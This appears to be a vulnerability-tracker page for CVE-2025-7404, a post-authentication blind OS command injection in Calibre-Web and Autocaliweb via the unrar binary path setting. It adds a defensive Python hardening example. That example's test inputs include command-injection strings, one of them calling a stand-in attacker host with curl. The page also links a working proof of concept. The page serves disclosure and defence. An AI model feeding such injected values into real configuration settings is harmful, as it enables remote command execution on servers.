CVE-2025-7404

CRITICAL

Calibre Web 0.6.24 and Autocaliweb 0.7.0 - Blind OS Command Injection


Exploitation Summary

EIP tracks one public exploit for CVE-2025-7404, a PoC published by mind2hex.

AI-analyzed exploit summary: the repository contains a working exploit for CVE-2025-7404, a blind OS command injection in Calibre-Web 0.6.24. It abuses the `config_rarfile_location` setting, an admin-only configuration value for the location of the unrar binary, to execute arbitrary commands on the host.

Description

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Calibre Web and Autocaliweb allows blind OS command injection. This issue affects Calibre Web 0.6.24 (Nicolette) and Autocaliweb from 0.7.0 before 0.7.1. "Blind" means the injected command's output is not returned in the HTTP response, so execution has to be confirmed out of band (timing, a DNS or HTTP callback, or a side effect on the host).
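The setting named in the summary is a path to an external binary that the application later executes, which is the classic shape behind CWE-78. Below is an added example, written for this page and not code from Calibre-Web or Autocaliweb, of the two controls that close that shape: validate the submitted value as a path, and invoke it as an argv list with shell=False so no part of it is ever parsed by a shell. The function names (validate_binary_path, run_tool, probe_version, argv_literal_demo), the ALLOWED_DIRS list and the sample inputs are assumptions constructed for the example, not taken from either project.

```python
"""Hardening pattern for an admin-controlled external-binary setting.

Added example, not Calibre-Web's or Autocaliweb's own code. It assumes a
setting shaped like ``config_rarfile_location`` (a path to a helper binary
that the application later runs) and shows the two controls that close
CWE-78 for that shape: validate the value as a path, and invoke it as an
argv list with shell=False.
"""
import os
import re
import stat
import subprocess
import sys
from dataclasses import dataclass
from typing import Optional, Sequence

# Anything a POSIX shell treats specially. A real binary path never needs
# these, so rejecting them is cheap defence in depth even though the
# argv-list invocation below never consults a shell.
_SHELL_META = re.compile(r"""[;&|`$<>(){}\[\]*?!~"'\\\s]""")

# Directories an admin may pick a helper binary from. Assumed for this
# example; a deployment would set it to where its packages install unrar.
ALLOWED_DIRS = ("/usr/bin", "/usr/local/bin", "/bin")


@dataclass(frozen=True)
class Validation:
    ok: bool
    detail: str  # reason on failure, canonical path on success


def validate_binary_path(value: str, allowed_dirs: Sequence[str] = ALLOWED_DIRS) -> Validation:
    """Accept only an absolute, existing, regular, executable file below an allowed directory."""
    if not value:
        return Validation(False, "empty value")
    if _SHELL_META.search(value):
        return Validation(False, "shell metacharacters in path")
    if not os.path.isabs(value):
        return Validation(False, "not an absolute path")
    real = os.path.realpath(value)  # collapse symlinks and '..' before the prefix check
    roots = [os.path.realpath(d) for d in allowed_dirs]
    if not any(real.startswith(r + os.sep) for r in roots):
        return Validation(False, "outside allowed directories")
    try:
        st = os.stat(real)
    except OSError:
        return Validation(False, "does not exist")
    if not stat.S_ISREG(st.st_mode):
        return Validation(False, "not a regular file")
    if not os.access(real, os.X_OK):
        return Validation(False, "not executable")
    return Validation(True, real)


@dataclass(frozen=True)
class RunResult:
    returncode: int
    stdout: str


def run_tool(path: str, args: Sequence[str], timeout: float = 5.0) -> Optional[RunResult]:
    """Invoke ``path`` with ``args`` as one argv list, never through a shell.

    A value such as "/usr/bin/unrar; id" is looked up as a single file name,
    fails with FileNotFoundError, and is reported as None instead of running
    ``id``.
    """
    try:
        proc = subprocess.run([path, *args], shell=False, capture_output=True,
                              text=True, timeout=timeout, check=False)
    except (FileNotFoundError, PermissionError, subprocess.TimeoutExpired):
        return None
    return RunResult(proc.returncode, proc.stdout)


def probe_version(value: str) -> Optional[RunResult]:
    """What a settings handler should do with a submitted path: validate, then run."""
    v = validate_binary_path(value)
    if not v.ok:
        return None
    return run_tool(v.detail, ["-V"])


def argv_literal_demo(payload: str) -> Optional[str]:
    """Show argv semantics with the interpreter itself (runs anywhere Python does):
    the payload comes back as one literal argument, not as a command."""
    r = run_tool(sys.executable, ["-c", "import sys; print(sys.argv[1], end='')", payload])
    return r.stdout if r else None


# Constructed inputs: a benign value followed by two command-injection attempts
# of the kind a path setting is exposed to.
SAMPLES = ["/usr/bin/unrar", "/usr/bin/unrar; id > /tmp/pwned", "$(curl attacker.example)"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:45} -> {validate_binary_path(s)}")
    print(argv_literal_demo("x; id"))
```

The directory allowlist matters as much as the metacharacter filter: without it an admin (or an attacker holding admin credentials) can point the setting at any executable the service user can reach, which is still code execution even when no shell is involved.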

Exploits (1)

nomisec WORKING POC
by mind2hex · poc
https://github.com/mind2hex/CVE-2025-7404-CalibreWeb-0.6.24-BlindCommandInjection

Classification
Working PoC: 95%
Attack type: RCE
Complexity: moderate
Reliability: reliable
Target: CalibreWeb 0.6.24
Auth required: yes
Prerequisites: admin credentials for CalibreWeb; network access to the target
Analyzed by devstral-2 on Feb 18, 2026

References (3)

Exploit, Third Party Advisory
https://fluidattacks.com/advisories/kino

Scores

CVSS v3.1: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
EPSS: 0.0233 (2.33% predicted exploitation probability), percentile 85.2%

The vector's PR:N (no privileges required) does not match the tracked PoC, which needs admin credentials to reach the setting. For prioritization, treat this as post-authentication RCE and weigh the exposure of the admin interface and the strength of its credentials accordingly.

CISA SSVC

Vulnrichment
Exploitation: poc
Automatable: no
Technical Impact: partial

Details

CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Status: published
Products (3):
gelbphoenix/autocaliweb 0.7.0
janeczku/calibre-web 0.6.24
pypi/calibreweb (PyPI)
Published: Jul 24, 2025
Tracked since: Feb 18, 2026